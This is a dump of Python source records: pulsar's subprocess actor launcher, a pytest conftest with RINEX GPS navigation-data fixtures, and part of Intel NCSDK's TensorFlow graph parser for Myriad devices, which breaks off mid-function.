84807805d4c9e99301ea9459dc3f1a877cc0d1c9 | 428 | py | Python | pulsar/async/_subprocess.py | PyCN/pulsar | fee44e871954aa6ca36d00bb5a3739abfdb89b26 | [
"BSD-3-Clause"
] | 1,410 | 2015-01-02T14:55:07.000Z | 2022-03-28T17:22:06.000Z | pulsar/async/_subprocess.py | PyCN/pulsar | fee44e871954aa6ca36d00bb5a3739abfdb89b26 | [
"BSD-3-Clause"
] | 194 | 2015-01-22T06:18:24.000Z | 2020-10-20T21:21:58.000Z | pulsar/async/_subprocess.py | PyCN/pulsar | fee44e871954aa6ca36d00bb5a3739abfdb89b26 | [
"BSD-3-Clause"
] | 168 | 2015-01-31T10:29:55.000Z | 2022-03-14T10:22:24.000Z |
if __name__ == '__main__':
import sys
import pickle
from multiprocessing import current_process
from multiprocessing.spawn import import_main_path
data = pickle.load(sys.stdin.buffer)
current_process().authkey = data['authkey']
sys.path = data['path']
import_main_path(data['main'])
impl = pickle.loads(data['impl'])
from pulsar.async.concurrency import run_actor
run_actor(impl)
| 25.176471 | 54 | 0.705607 |
if __name__ == '__main__':
import sys
import pickle
from multiprocessing import current_process
from multiprocessing.spawn import import_main_path
data = pickle.load(sys.stdin.buffer)
current_process().authkey = data['authkey']
sys.path = data['path']
import_main_path(data['main'])
impl = pickle.loads(data['impl'])
from pulsar.async.concurrency import run_actor
run_actor(impl)
| 0 | 0 | 0 |
59627c56bf8f3b4b82db7818b4d48287abf4a605 | 5,750 | py | Python | tests/conftest.py | ilya-e/coordinates | 328ef6f07450592524b49c71a0859c3b1d1fd489 | [
"MIT"
] | null | null | null | tests/conftest.py | ilya-e/coordinates | 328ef6f07450592524b49c71a0859c3b1d1fd489 | [
"MIT"
] | 4 | 2019-05-15T10:24:48.000Z | 2022-01-28T01:14:55.000Z | tests/conftest.py | ilya-e/coordinates | 328ef6f07450592524b49c71a0859c3b1d1fd489 | [
"MIT"
] | 5 | 2017-12-23T09:48:07.000Z | 2022-03-17T05:52:02.000Z | from io import StringIO
import pytest
from testlib import mktmp
_nav_content_v2 = '''\
2 NAVIGATION DATA RINEX VERSION / TYPE
CCRINEXN V1.6.0 UX CDDIS 12-APR-16 17:31 PGM / RUN BY / DATE
IGS BROADCAST EPHEMERIS FILE COMMENT
0.1583D-07 0.1490D-07 -0.1192D-06 -0.1192D-06 ION ALPHA
0.1065D+06 0.6554D+05 -0.1966D+06 -0.1966D+06 ION BETA
0.186264514923D-08 0.000000000000D+00 233472 1892 DELTA-UTC: A0,A1,T,W
17 LEAP SECONDS
END OF HEADER
1 16 4 11 0 0 0.0 0.169607810676D-04 0.113686837722D-11 0.000000000000D+00
0.350000000000D+02 0.222500000000D+02 0.482198656938D-08 0.368417754673D+00
0.121630728245D-05 0.527631223667D-02 0.668689608574D-05 0.515364252472D+04
0.864000000000D+05 0.391155481338D-07-0.140616900879D+01 0.106170773506D-06
0.963711739811D+00 0.247687500000D+03 0.450110393247D+00-0.827070165078D-08
0.284654714154D-09 0.100000000000D+01 0.189200000000D+04 0.000000000000D+00
0.200000000000D+01 0.000000000000D+00 0.512227416039D-08 0.350000000000D+02
0.805020000000D+05 0.400000000000D+01 0.000000000000D+00 0.000000000000D+00
2 16 4 11 0 0 0.0 0.597649253905D-03-0.181898940355D-11 0.000000000000D+00
0.830000000000D+02 0.185937500000D+02 0.527057686384D-08 0.763017673126D+00
0.114180147648D-05 0.156129685929D-01 0.783614814282D-05 0.515374914742D+04
0.864000000000D+05-0.163912773132D-06-0.145069785349D+01 0.100582838059D-06
0.942463959213D+00 0.223656250000D+03-0.213318032835D+01-0.861071569602D-08
0.216080431326D-09 0.100000000000D+01 0.189200000000D+04 0.000000000000D+00
0.200000000000D+01 0.000000000000D+00-0.200234353542D-07 0.830000000000D+02
0.864000000000D+05 0.000000000000D+00 0.000000000000D+00 0.000000000000D+00
'''
_nav_content_v3 = '''\
3.03 NAVIGATION DATA M (Mixed) RINEX VERSION / TYPE
BCEmerge congo 20170909 012902 GMT PGM / RUN BY / DATE
Merged GPS/GLO/GAL/BDS/QZS/SBAS/IRNSS navigation file COMMENT
based on CONGO and MGEX tracking data COMMENT
DLR: O. Montenbruck; TUM: P. Steigenberger COMMENT
GAUT 2.7939677238e-09 1.776356839e-15 345600 1965 TIME SYSTEM CORR
GLGP 1.8626451492e-08 0.000000000e+00 345600 1965 TIME SYSTEM CORR
GLUT 9.3132257462e-10 0.000000000e+00 345600 1965 TIME SYSTEM CORR
GPGA 1.0040821508e-08 3.330669074e-14 432000 1965 TIME SYSTEM CORR
GPUT 9.3132257462e-10 1.776356839e-15 589824 1965 TIME SYSTEM CORR
QZUT 6.5192580223e-09 0.000000000e+00 8192 1966 TIME SYSTEM CORR
18 LEAP SECONDS
END OF HEADER
G01 2017 09 08 00 00 00 5.530333146453e-05-4.547473508865e-13 0.000000000000e+00
7.200000000000e+01-2.653125000000e+01 4.883774857397e-09-2.309091328065e-01
-1.233071088791e-06 7.021094555967e-03 2.788379788399e-06 5.153673307419e+03
4.320000000000e+05 7.823109626770e-08 2.011192878165e+00 4.284083843231e-08
9.681868691207e-01 3.310000000000e+02 6.192489497701e-01-8.576071513516e-09
-2.500104139373e-11 1.000000000000e+00 1.965000000000e+03 0.000000000000e+00
2.000000000000e+00 0.000000000000e+00 5.587935447693e-09 7.200000000000e+01
4.248180000000e+05 4.000000000000e+00
S20 2017 09 08 00 16 32 0.000000000000e+00 0.000000000000e+00 4.330030000000e+05
4.063672000000e+04 0.000000000000e+00 0.000000000000e+00 1.000000000000e+00
-1.124591600000e+04 0.000000000000e+00 0.000000000000e+00 3.276700000000e+04
0.000000000000e+00 0.000000000000e+00 0.000000000000e+00 2.150000000000e+02
'''
_nav_content_v3_unsorted = '''\
3.03 NAVIGATION DATA M (Mixed) RINEX VERSION / TYPE
BCEmerge congo 20170909 012902 GMT PGM / RUN BY / DATE
18 LEAP SECONDS
END OF HEADER
S20 2017 09 08 00 05 52 0.000000000000e+00 0.000000000000e+00 4.323620000000e+05
4.063672000000e+04 0.000000000000e+00 0.000000000000e+00 1.000000000000e+00
-1.124591600000e+04 0.000000000000e+00 0.000000000000e+00 3.276700000000e+04
0.000000000000e+00 0.000000000000e+00 0.000000000000e+00 2.200000000000e+01
S20 2017 09 08 00 00 32 0.000000000000e+00 0.000000000000e+00 4.320410000000e+05
4.063672000000e+04 0.000000000000e+00 0.000000000000e+00 1.000000000000e+00
-1.124591600000e+04 0.000000000000e+00 0.000000000000e+00 3.276700000000e+04
0.000000000000e+00 0.000000000000e+00 0.000000000000e+00 2.000000000000e+00
S20 2017 09 08 00 03 12 0.000000000000e+00 0.000000000000e+00 4.322000000000e+05
4.063672000000e+04 0.000000000000e+00 0.000000000000e+00 1.000000000000e+00
-1.124591600000e+04 0.000000000000e+00 0.000000000000e+00 3.276700000000e+04
0.000000000000e+00 0.000000000000e+00 0.000000000000e+00 1.200000000000e+01
'''
@pytest.fixture
@pytest.fixture
@pytest.fixture
@pytest.fixture
@pytest.fixture
| 55.288462 | 80 | 0.669217 | from io import StringIO
import pytest
from testlib import mktmp
_nav_content_v2 = '''\
2 NAVIGATION DATA RINEX VERSION / TYPE
CCRINEXN V1.6.0 UX CDDIS 12-APR-16 17:31 PGM / RUN BY / DATE
IGS BROADCAST EPHEMERIS FILE COMMENT
0.1583D-07 0.1490D-07 -0.1192D-06 -0.1192D-06 ION ALPHA
0.1065D+06 0.6554D+05 -0.1966D+06 -0.1966D+06 ION BETA
0.186264514923D-08 0.000000000000D+00 233472 1892 DELTA-UTC: A0,A1,T,W
17 LEAP SECONDS
END OF HEADER
1 16 4 11 0 0 0.0 0.169607810676D-04 0.113686837722D-11 0.000000000000D+00
0.350000000000D+02 0.222500000000D+02 0.482198656938D-08 0.368417754673D+00
0.121630728245D-05 0.527631223667D-02 0.668689608574D-05 0.515364252472D+04
0.864000000000D+05 0.391155481338D-07-0.140616900879D+01 0.106170773506D-06
0.963711739811D+00 0.247687500000D+03 0.450110393247D+00-0.827070165078D-08
0.284654714154D-09 0.100000000000D+01 0.189200000000D+04 0.000000000000D+00
0.200000000000D+01 0.000000000000D+00 0.512227416039D-08 0.350000000000D+02
0.805020000000D+05 0.400000000000D+01 0.000000000000D+00 0.000000000000D+00
2 16 4 11 0 0 0.0 0.597649253905D-03-0.181898940355D-11 0.000000000000D+00
0.830000000000D+02 0.185937500000D+02 0.527057686384D-08 0.763017673126D+00
0.114180147648D-05 0.156129685929D-01 0.783614814282D-05 0.515374914742D+04
0.864000000000D+05-0.163912773132D-06-0.145069785349D+01 0.100582838059D-06
0.942463959213D+00 0.223656250000D+03-0.213318032835D+01-0.861071569602D-08
0.216080431326D-09 0.100000000000D+01 0.189200000000D+04 0.000000000000D+00
0.200000000000D+01 0.000000000000D+00-0.200234353542D-07 0.830000000000D+02
0.864000000000D+05 0.000000000000D+00 0.000000000000D+00 0.000000000000D+00
'''
_nav_content_v3 = '''\
3.03 NAVIGATION DATA M (Mixed) RINEX VERSION / TYPE
BCEmerge congo 20170909 012902 GMT PGM / RUN BY / DATE
Merged GPS/GLO/GAL/BDS/QZS/SBAS/IRNSS navigation file COMMENT
based on CONGO and MGEX tracking data COMMENT
DLR: O. Montenbruck; TUM: P. Steigenberger COMMENT
GAUT 2.7939677238e-09 1.776356839e-15 345600 1965 TIME SYSTEM CORR
GLGP 1.8626451492e-08 0.000000000e+00 345600 1965 TIME SYSTEM CORR
GLUT 9.3132257462e-10 0.000000000e+00 345600 1965 TIME SYSTEM CORR
GPGA 1.0040821508e-08 3.330669074e-14 432000 1965 TIME SYSTEM CORR
GPUT 9.3132257462e-10 1.776356839e-15 589824 1965 TIME SYSTEM CORR
QZUT 6.5192580223e-09 0.000000000e+00 8192 1966 TIME SYSTEM CORR
18 LEAP SECONDS
END OF HEADER
G01 2017 09 08 00 00 00 5.530333146453e-05-4.547473508865e-13 0.000000000000e+00
7.200000000000e+01-2.653125000000e+01 4.883774857397e-09-2.309091328065e-01
-1.233071088791e-06 7.021094555967e-03 2.788379788399e-06 5.153673307419e+03
4.320000000000e+05 7.823109626770e-08 2.011192878165e+00 4.284083843231e-08
9.681868691207e-01 3.310000000000e+02 6.192489497701e-01-8.576071513516e-09
-2.500104139373e-11 1.000000000000e+00 1.965000000000e+03 0.000000000000e+00
2.000000000000e+00 0.000000000000e+00 5.587935447693e-09 7.200000000000e+01
4.248180000000e+05 4.000000000000e+00
S20 2017 09 08 00 16 32 0.000000000000e+00 0.000000000000e+00 4.330030000000e+05
4.063672000000e+04 0.000000000000e+00 0.000000000000e+00 1.000000000000e+00
-1.124591600000e+04 0.000000000000e+00 0.000000000000e+00 3.276700000000e+04
0.000000000000e+00 0.000000000000e+00 0.000000000000e+00 2.150000000000e+02
'''
_nav_content_v3_unsorted = '''\
3.03 NAVIGATION DATA M (Mixed) RINEX VERSION / TYPE
BCEmerge congo 20170909 012902 GMT PGM / RUN BY / DATE
18 LEAP SECONDS
END OF HEADER
S20 2017 09 08 00 05 52 0.000000000000e+00 0.000000000000e+00 4.323620000000e+05
4.063672000000e+04 0.000000000000e+00 0.000000000000e+00 1.000000000000e+00
-1.124591600000e+04 0.000000000000e+00 0.000000000000e+00 3.276700000000e+04
0.000000000000e+00 0.000000000000e+00 0.000000000000e+00 2.200000000000e+01
S20 2017 09 08 00 00 32 0.000000000000e+00 0.000000000000e+00 4.320410000000e+05
4.063672000000e+04 0.000000000000e+00 0.000000000000e+00 1.000000000000e+00
-1.124591600000e+04 0.000000000000e+00 0.000000000000e+00 3.276700000000e+04
0.000000000000e+00 0.000000000000e+00 0.000000000000e+00 2.000000000000e+00
S20 2017 09 08 00 03 12 0.000000000000e+00 0.000000000000e+00 4.322000000000e+05
4.063672000000e+04 0.000000000000e+00 0.000000000000e+00 1.000000000000e+00
-1.124591600000e+04 0.000000000000e+00 0.000000000000e+00 3.276700000000e+04
0.000000000000e+00 0.000000000000e+00 0.000000000000e+00 1.200000000000e+01
'''
@pytest.fixture
def nav_file_v2():
return mktmp(_nav_content_v2)
@pytest.fixture
def nav_iter_v2():
return StringIO(_nav_content_v2)
@pytest.fixture
def nav_file_v3():
return mktmp(_nav_content_v3)
@pytest.fixture
def nav_iter_v3():
return StringIO(_nav_content_v3)
@pytest.fixture
def nav_file_unsorted_v3():
return mktmp(_nav_content_v3_unsorted)
| 179 | 0 | 110 |
dbbcbe484440229c47401ead61b8028c24591e0c | 83,613 | py | Python | tool/Controllers/TensorFlowParser.py | HornedSungem/SungemSDK-Python | 5ce5eb7f84654aecf6840de773188f436219559d | [
"Apache-2.0"
] | 14 | 2018-08-16T09:11:39.000Z | 2019-12-07T12:54:32.000Z | movidius/NCSDK/ncsdk-x86_64/tk/Controllers/TensorFlowParser.py | satabios/Yolo-implementation-using-Intel-Movidius-Neural-Compute-Stick-NCS-on-Raspberry-Pi | 79b410b5a4c6deea209ef999a97c5e32da58653f | [
"MIT"
] | 2 | 2019-08-23T23:31:10.000Z | 2020-06-17T09:21:57.000Z | tool/Controllers/TensorFlowParser.py | HornedSungem/SungemSDK-Python | 5ce5eb7f84654aecf6840de773188f436219559d | [
"Apache-2.0"
] | 7 | 2018-10-02T01:46:43.000Z | 2021-06-04T19:10:47.000Z | # Copyright 2017 Intel Corporation.
# The source code, information and material ("Material") contained herein is
# owned by Intel Corporation or its suppliers or licensors, and title to such
# Material remains with Intel Corporation or its suppliers or licensors.
# The Material contains proprietary information of Intel or its suppliers and
# licensors. The Material is protected by worldwide copyright laws and treaty
# provisions.
# No part of the Material may be used, copied, reproduced, modified, published,
# uploaded, posted, transmitted, distributed or disclosed in any way without
# Intel's prior express written permission. No license under any patent,
# copyright or other intellectual property rights in the Material is granted to
# or conferred upon you, either expressly, by implication, inducement, estoppel
# or otherwise.
# Any license under such intellectual property rights must be express and
# approved by Intel in writing.
import sys
import tensorflow as tf
import google.protobuf as proto
import numpy as np
import math
import re
from Models.Network import *
from Models.NetworkStage import *
from Models.EnumDeclarations import *
from tensorflow.core.framework import graph_pb2
from tensorflow.python.framework import ops
from Controllers.TensorFlowPreproc import TFPreprocessor
from Controllers.TensorFlowPreproc import PatternType
sys.setrecursionlimit(5000)
placeholder_dict = {}
const_dict = {}
node_dict = {}
variable_dict = {}
concat_tracker = []
reshape_tracker = []
identity_tracker = []
padding_tracker = []
inputnode = 'input'
os.environ["TF_CPP_MIN_LOG_LEVEL"] = "2"
def same_padding(in_dim, kernel_dim, stride_dim):
"""
Calculates the output dimension and also the padding required for that dimension.
:param in_dim: Width/Height of Input
:param kernel_dim: Width/Height of Kernel
:param stride_dim: Vertical/Horizontal Stride
"""
output_dim = math.ceil(float(in_dim) / float(stride_dim))
pad = ((output_dim - 1) * stride_dim + kernel_dim - in_dim) / 2
return output_dim, pad
def get_deconv_padding(input_shape, output_shape, kernel_shape, stride):
"""
input_shape: N,H,W,C
output_shape: N,H,W,C
kernel_shape: kh,kw
stride: 1,sh,sw,sc
"""
pady = 0
padx = 0
# 2Xpad = stride X (input - 1) + kernel - out
pady = stride[1] * (input_shape[1] - 1) + kernel_shape[0] - output_shape[1]
padx = stride[2] * (input_shape[2] - 1) + kernel_shape[1] - output_shape[2]
if (pady % 2 == 1):
pady = -1
else:
pady = pady / 2
if (padx % 2 == 1):
padx = -1
else:
padx = padx / 2
return int(pady), int(padx)
# Count how many times we need this as an input
| 44.784681 | 186 | 0.392642 | # Copyright 2017 Intel Corporation.
# The source code, information and material ("Material") contained herein is
# owned by Intel Corporation or its suppliers or licensors, and title to such
# Material remains with Intel Corporation or its suppliers or licensors.
# The Material contains proprietary information of Intel or its suppliers and
# licensors. The Material is protected by worldwide copyright laws and treaty
# provisions.
# No part of the Material may be used, copied, reproduced, modified, published,
# uploaded, posted, transmitted, distributed or disclosed in any way without
# Intel's prior express written permission. No license under any patent,
# copyright or other intellectual property rights in the Material is granted to
# or conferred upon you, either expressly, by implication, inducement, estoppel
# or otherwise.
# Any license under such intellectual property rights must be express and
# approved by Intel in writing.
import sys
import tensorflow as tf
import google.protobuf as proto
import numpy as np
import math
import re
from Models.Network import *
from Models.NetworkStage import *
from Models.EnumDeclarations import *
from tensorflow.core.framework import graph_pb2
from tensorflow.python.framework import ops
from Controllers.TensorFlowPreproc import TFPreprocessor
from Controllers.TensorFlowPreproc import PatternType
sys.setrecursionlimit(5000)
placeholder_dict = {}
const_dict = {}
node_dict = {}
variable_dict = {}
concat_tracker = []
reshape_tracker = []
identity_tracker = []
padding_tracker = []
inputnode = 'input'
os.environ["TF_CPP_MIN_LOG_LEVEL"] = "2"
def apply_padding(pad_type, in_dim, kernel_dim, stride_dim):
if pad_type == b'SAME':
return same_padding(in_dim, kernel_dim, stride_dim)
elif pad_type == b'VALID':
return valid_padding(in_dim, kernel_dim, stride_dim)
else:
throw_error(
ErrorTable.StageDetailsNotSupported,
"No Such Pad Type Supported." +
str(pad_type))
def same_padding(in_dim, kernel_dim, stride_dim):
"""
Calculates the output dimension and also the padding required for that dimension.
:param in_dim: Width/Height of Input
:param kernel_dim: Width/Height of Kernel
:param stride_dim: Vertical/Horizontal Stride
"""
output_dim = math.ceil(float(in_dim) / float(stride_dim))
pad = ((output_dim - 1) * stride_dim + kernel_dim - in_dim) / 2
return output_dim, pad
def valid_padding(in_dim, kernel_dim, stride_dim):
output_dim = math.ceil(float(in_dim - kernel_dim + 1) / float(stride_dim))
pad = 0
return output_dim, pad
def get_deconv_padding(input_shape, output_shape, kernel_shape, stride):
"""
input_shape: N,H,W,C
output_shape: N,H,W,C
kernel_shape: kh,kw
stride: 1,sh,sw,sc
"""
pady = 0
padx = 0
# 2Xpad = stride X (input - 1) + kernel - out
pady = stride[1] * (input_shape[1] - 1) + kernel_shape[0] - output_shape[1]
padx = stride[2] * (input_shape[2] - 1) + kernel_shape[1] - output_shape[2]
if (pady % 2 == 1):
pady = -1
else:
pady = pady / 2
if (padx % 2 == 1):
padx = -1
else:
padx = padx / 2
return int(pady), int(padx)
def get_input(name, fail=True):
global placeholder_dict
global const_dict
global concat_tracker
global reshape_tracker
global identity_tracker
if len(concat_tracker) != 0:
# We track all previous concats, as we may have a many-to-many
# connection
for concat in concat_tracker:
if concat[0] == name:
# If the next layer will try to attach to the non-existant
# concat intermediary node.
ret = []
for l in concat[1]:
a = get_input(l)
if isinstance(a[0], list):
for a1 in a[0]:
ret.append(a1)
else:
ret.append(a[0])
return [ret]
if len(reshape_tracker) != 0:
for reshape in reshape_tracker:
if reshape[0] == name:
return get_input(reshape[1])
if len(identity_tracker) != 0:
for idn in identity_tracker:
if idn[0] == name:
if idn[1] == inputnode:
return None
if get_input(idn[1], False) == 0:
return 0
return get_input(idn[1])
if name == inputnode:
return None
if name in node_dict.keys():
return [node_dict[name].unprocessed_name]
if not fail:
return 0
if name in const_dict.keys():
throw_error(
ErrorTable.StageDetailsNotSupported,
"Top Not Supported - Constants " +
str(name))
else:
throw_error(
ErrorTable.StageDetailsNotSupported,
"Top Not Found " + str(name))
def get_padding_input(name):
global padding_tracker
for padding in padding_tracker:
if padding[0] == name:
return padding[1], padding[2]
return None, None
def have_first_input(name):
if name == inputnode:
return True
if len(identity_tracker) != 0:
for idn in identity_tracker:
if idn[0] == name:
if idn[1] == inputnode:
return True
return False
def strip_tensor_id(word):
return word.replace(':0', '').replace(':','#')
# Count how many times we need this as an input
def count_inputs(t):
graph = tf.get_default_graph()
count = 0
for node in graph.get_operations():
for a in node.inputs:
if a.name == t:
count = count + 1
return count
def parse_tensor(arguments, myriad_conf, preprocess=True, debug=False, file_gen=False):
global const_dict
global placeholder_dict
global node_dict
global concat_tracker
global identity_tracker
global reshape_tracker
global padding_tracker
global inputnode
path = arguments.net_description
image = arguments.image
output_node_name = arguments.output_node_name
input_node_name = arguments.input_node_name
filename = arguments.outputs_name
if input_node_name is not None:
inputnode = input_node_name
# debug = True
with tf.Session() as sess:
filetype = path.split(".")[-1]
if filetype == 'pb':
graph_def = graph_pb2.GraphDef()
with open(path, 'rb') as f:
graph_def.ParseFromString(f.read())
tf.import_graph_def(graph_def, name="")
else:
saver = tf.train.import_meta_graph(path, clear_devices=True)
if saver is not None:
weight_filename = arguments.net_weights
if weight_filename == None:
weight_filename = path[:path.rfind('.')]
saver.restore(sess, weight_filename)
graph = tf.get_default_graph()
preprocessor = None
if preprocess:
preprocessor = TFPreprocessor()
preprocessor.preprocess(graph)
inputTensor = graph.get_tensor_by_name(inputnode + ':0')
if output_node_name is None:
output_node_name = 'output'
try:
outputTensor = graph.get_tensor_by_name(output_node_name + ':0')
except:
throw_error(ErrorTable.NoOutputNode, output_node_name + ':0')
shape = inputTensor.get_shape()
if shape.dims is None:
# If the network does not give an input shape, assume this
# we will need to add this as a parameter
shape = [1, 224, 224, 3]
if arguments.input_size:
shape = [1,
arguments.input_size[1],
arguments.input_size[0],
3]
if isinstance(shape, tf.TensorShape):
shape_list = shape.as_list()
# Tensorflow can have None in the batch size field of the
# input shape, if that is the case then set it to 1
if None == shape_list[0]:
shape_list[0] = 1
shape = shape_list
inputTensor.set_shape(shape)
elif None in shape:
throw_error(ErrorTable.TFNotEvaluated)
if image is None or image == "Debug":
input_data = np.random.uniform(0, 1, shape)
if debug:
print("Input image shape", shape)
else:
input_data = parse_img(image,
[int(shape[0]),
int(shape[3]),
int(shape[1]),
int(shape[2])],
raw_scale=arguments.raw_scale,
mean=arguments.mean,
channel_swap=arguments.channel_swap)
input_data = input_data.transpose([0, 2, 3, 1])
network = Network("TensorFlow Network", input_data)
arguments.network = network
res = outputTensor.eval(feed_dict={inputnode + ':0' : input_data})
prev_node = None
prev_node_label = None
cnt = 0
inputfound = False
for idx, node in enumerate(graph.get_operations()):
if debug:
print(" ", idx, node.type, node.name)
for a in node.inputs:
print(" IN:", a.name)
for a in node.outputs:
print(" OUT:", a.name)
if not inputfound:
if have_first_input(strip_tensor_id(node.outputs[0].name)):
inputfound = True
if debug:
print('Starting to process')
continue
# Each layer can have a placeholder for the batch size.
for output_item in node.outputs:
item_shape = output_item.shape.as_list()
if len(item_shape) > 0 and \
item_shape[0] == None:
item_shape[0] = 1
output_item.set_shape(item_shape)
if preprocessor:
pattern_found, current_pattern = preprocessor.pattern_found(node)
if pattern_found:
if current_pattern.get_type() == PatternType.Completed:
continue
else:
if current_pattern.get_type() == PatternType.LeakyReLU:
if debug:
print("LeakyRelu")
if len(current_pattern.get_input_shape()) == 4:
node.outputs[0].set_shape([current_pattern.get_input_shape()[0],
current_pattern.get_input_shape()[1],
current_pattern.get_input_shape()[2],
current_pattern.get_output_shape()[3]])
elif len(current_pattern.get_input_shape()) == 2:
node.outputs[0].set_shape([current_pattern.get_input_shape()[0],
current_pattern.get_input_shape()[1]])
else:
throw_error(ErrorTable.StageDetailsNotSupported, "Unsupported LeakyRelu Dimensions")
prev_node.postOp = StageType.leaky_relu
prev_node.post_param1 = current_pattern.get_param(0)
prev_node.changeName(current_pattern.get_name())
prev_node_label = strip_tensor_id(current_pattern.get_prev_name())
node_dict[prev_node_label] = prev_node
else:
throw_error(ErrorTable.StageDetailsNotSupported,
"Pattern not supported " + str(current_pattern.get_type().name))
if node.type == "Const":
const_dict[node.name] = node.outputs[0].get_shape()
elif node.type == "Placeholder":
placeholder_dict[node.name] = node.outputs[0].get_shape()
elif node.type == 'Variable' or node.type == 'VariableV2':
variable_dict[node.name] = node.outputs[0].get_shape()
elif node.type == "Conv2D":
if debug:
print("Conv2D")
inputs = node.inputs[0]
input_shape = inputs.get_shape()
# If the network does not have predetermined input shape, take
# if from input
if input_shape.dims is None and inputs.name == input_node_name + ':0':
input_shape = input_data.shape
taps = node.inputs[1]
taps_shape = node.inputs[1].get_shape()
outputs = node.outputs[0].get_shape()
ksize = taps_shape[0]
stride = node.get_attr("strides")
output_size = [input_shape[0],
apply_padding(node.get_attr("padding"),
int(input_shape[1]),
int(ksize),
stride[1])[0],
apply_padding(node.get_attr("padding"),
int(input_shape[2]),
int(ksize),
stride[2])[0],
outputs[3]]
node.outputs[0].set_shape(output_size)
top, padding = get_padding_input(strip_tensor_id(inputs.name))
padx = 0
pady = 0
padstyle = PadStyle.tfsame if node.get_attr(
"padding") == b'SAME' else PadStyle.tfvalid
if top is not None:
if top == inputnode:
top = None
else:
top = [top]
pady = padding[1][0]
padx = padding[2][0]
padstyle = PadStyle.caffe
input_shape = [
input_shape[0],
input_shape[1] - 2 * pady,
input_shape[2] - 2 * padx,
input_shape[3]]
else:
top = get_input(strip_tensor_id(inputs.name))
xyz = (int(input_shape[1]),
int(input_shape[2]),
int(input_shape[3]))
prev_node = NetworkStage(strip_tensor_id(node.outputs[0].name),
top,
StorageOrder.orderYXZ,
pady,
padx,
padstyle,
DataType.fp16,
DataType.fp16,
StageType.convolution,
int(taps_shape[0]),
int(taps_shape[1]),
stride[1],
stride[2],
xyz[0],
xyz[1],
xyz[2],
int(taps_shape[0]),
int(taps_shape[1]),
int(taps_shape[3]),
np.array(taps.eval()),
TapsOrder.orderHWCK,
None,
None,
None,
None,
0,
0,
myriad_config=myriad_conf,
args=arguments)
network.attach(prev_node)
prev_node_label = strip_tensor_id(node.outputs[0].name)
node_dict[prev_node_label] = prev_node
# node_dict
cnt += 1
elif node.type == 'DepthwiseConv2dNative':
if debug:
print("DepthwiseConv2dNative")
inputs = node.inputs[0]
input_shape = inputs.get_shape()
# If the network does not have predetermined input shape, take
# if from input
if input_shape.dims is None and inputs.name == input_node_name + ':0':
input_shape = input_data.shape
taps = node.inputs[1]
taps_shape = node.inputs[1].get_shape()
outputs = node.outputs[0].get_shape()
ksize = taps_shape[0]
stride = node.get_attr("strides")
output_size = [input_shape[0],
apply_padding(node.get_attr("padding"),
int(input_shape[1]),
int(ksize),
stride[1])[0],
apply_padding(node.get_attr("padding"),
int(input_shape[2]),
int(ksize),
stride[2])[0],
outputs[3]]
if debug:
print(output_size)
node.outputs[0].set_shape(output_size)
top, padding = get_padding_input(strip_tensor_id(inputs.name))
padx = 0
pady = 0
padstyle = PadStyle.tfsame if node.get_attr(
"padding") == b'SAME' else PadStyle.tfvalid
if top is not None:
if top == inputnode:
top = None
else:
top = [top]
pady = padding[1][0]
padx = padding[2][0]
padstyle = PadStyle.caffe
input_shape = [
input_shape[0],
input_shape[1] - 2 * pady,
input_shape[2] - 2 * padx,
input_shape[3]]
else:
top = get_input(strip_tensor_id(inputs.name))
xyz = (int(input_shape[1]),
int(input_shape[2]),
int(input_shape[3]))
taps2 = np.array(taps.eval())
prev_node = NetworkStage(strip_tensor_id(node.outputs[0].name),
top,
StorageOrder.orderYXZ,
pady,
padx,
padstyle,
DataType.fp16,
DataType.fp16,
StageType.depthwise_convolution,
int(taps_shape[0]),
int(taps_shape[1]),
stride[1],
stride[2],
xyz[0],
xyz[1],
xyz[2],
int(taps_shape[0]),
int(taps_shape[1]),
int(taps_shape[2]) * int(taps_shape[3]),
taps2,
TapsOrder.orderHWCK,
None,
None,
None,
None,
0,
0,
myriad_config=myriad_conf,
args=arguments)
network.attach(prev_node)
prev_node_label = strip_tensor_id(node.outputs[0].name)
node_dict[prev_node_label] = prev_node
# node_dict
cnt += 1
elif node.type == "Conv2DBackpropInput":
inputs = node.inputs[2]
input_shape = inputs.get_shape()
# If the network does not have predetermined input shape, take
# if from input
if input_shape.dims is None and inputs.name == input_node_name + ':0':
input_shape = input_data.shape
taps = node.inputs[1]
taps_shape = node.inputs[1].get_shape().as_list()
outputs = node.outputs[0].get_shape()
ksize = [taps_shape[0], taps_shape[1]]
stride = node.get_attr("strides")
output_size = node.inputs[0].eval()
node.outputs[0].set_shape(output_size)
top, padding = get_padding_input(strip_tensor_id(inputs.name))
pady, padx = get_deconv_padding(input_shape.as_list(), output_size, ksize, stride)
if pady < 0 or padx < 0:
throw_error(ErrorTable.StageDetailsNotSupported, "Wrong deconvolution output shape.")
padstyle = PadStyle.caffe
if top is not None:
if top == inputnode:
top = None
else:
top = [top]
pady = padding[1][0]
padx = padding[2][0]
input_shape = [
input_shape[0],
input_shape[1] - 2 * pady,
input_shape[2] - 2 * padx,
input_shape[3]]
else:
top = get_input(strip_tensor_id(inputs.name))
xyz = (int(input_shape[1]),
int(input_shape[2]),
int(input_shape[3]))
tapval = taps.eval()
tapval = np.swapaxes(tapval, 2, 3)
tapval = tapval[::-1,::-1,:,:]
prev_node = NetworkStage(strip_tensor_id(node.outputs[0].name),
top,
StorageOrder.orderYXZ,
pady,
padx,
padstyle,
DataType.fp16,
DataType.fp16,
StageType.deconvolution,
int(taps_shape[0]),
int(taps_shape[1]),
stride[1],
stride[2],
xyz[0],
xyz[1],
xyz[2],
int(taps_shape[0]),
int(taps_shape[1]),
int(taps_shape[2]),
np.array(tapval),
TapsOrder.orderHWCK,
None,
None,
None,
None,
0,
0,
myriad_config=myriad_conf,
args=arguments)
network.attach(prev_node)
prev_node_label = strip_tensor_id(node.outputs[0].name)
node_dict[prev_node_label] = prev_node
# node_dict
cnt += 1
elif (node.type == 'BiasAdd' or node.type == 'Add' and
get_input(strip_tensor_id(node.inputs[0].name), False) != 0 and
get_input(strip_tensor_id(node.inputs[1].name), False) == 0 and
len(node.inputs[0].get_shape()) != 1):
if debug:
print("BiasAdd")
inputs = node.inputs[0].get_shape()
bias_data = node.inputs[1]
outputs = node.outputs[0].get_shape()
if(len(inputs) == 4):
node.outputs[0].set_shape(
[inputs[0], inputs[1], inputs[2], outputs[3]])
elif(len(inputs) == 2):
node.outputs[0].set_shape([inputs[0], inputs[1]])
else:
throw_error(
ErrorTable.StageDetailsNotSupported,
"Unsupported Bias Dimensions")
prev_node = network.search(strip_tensor_id(node.inputs[0].name))
bias = np.array(bias_data.eval())
if bias.size == 1:
#bias is a constant, transform it to a vector
prev_node.addBias( (np.ones(outputs) * bias).astype(np.float16) )
else:
